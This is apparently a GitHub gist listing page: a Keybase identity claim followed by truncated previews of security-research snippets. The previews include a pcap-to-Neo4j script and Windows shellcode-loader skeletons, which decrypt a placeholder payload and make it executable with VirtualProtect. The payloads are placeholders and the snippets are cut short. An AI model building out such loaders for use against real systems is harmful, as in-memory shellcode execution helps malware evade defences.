I hereby claim:
- I am multiplex3r on github.
- I am multiplex3r (https://keybase.io/multiplex3r) on keybase.
- I have a public key whose fingerprint is DFDF F47F 4C00 076C 2C82 A834 6716 6CA8 F415 CCB5
To claim this, I am signing this object:
| #!/usr/bin/env python3 | |
| from scapy.all import * | |
| from py2neo import Graph, Node, Relationship | |
| packets = rdpcap("<your_pcap_file>") | |
| g = Graph(password="<your_neo4j_password>") | |
| for packet in packets.sessions(): | |
| pkt = packet.split() | 
| #include <windows.h> | |
| unsigned char buf[] = | |
| "your" | |
| "encrypted" | |
| "shellcode" | |
| "here"; | |
| char* decryptPayload(){ | 
| #!/usr/bin/env python | |
| import sys | |
| def chunks(l, n): | |
| for i in range(0, len(l), n): | |
| yield l[i:i + n] | |
| shellcode = "your" | |
| shellcode += "shellcode" | |
| shellcode += "here" | 
| #include <windows.h> | |
| unsigned char buf[] = | |
| "your" | |
| "shellcode" | |
| "here"; | |
| void executePayload(){ | |
| DWORD pewpewpew; | |
| VirtualProtect(buf, sizeof(buf),PAGE_EXECUTE_READWRITE, &pewpewpew); | 
| #include <windows.h> | |
| #include <winbase.h> | |
| void main(){ | |
| MessageBox(0,"You have been pwnd!","Pwnd!",1); | |
| } | 
I hereby claim:
To claim this, I am signing this object: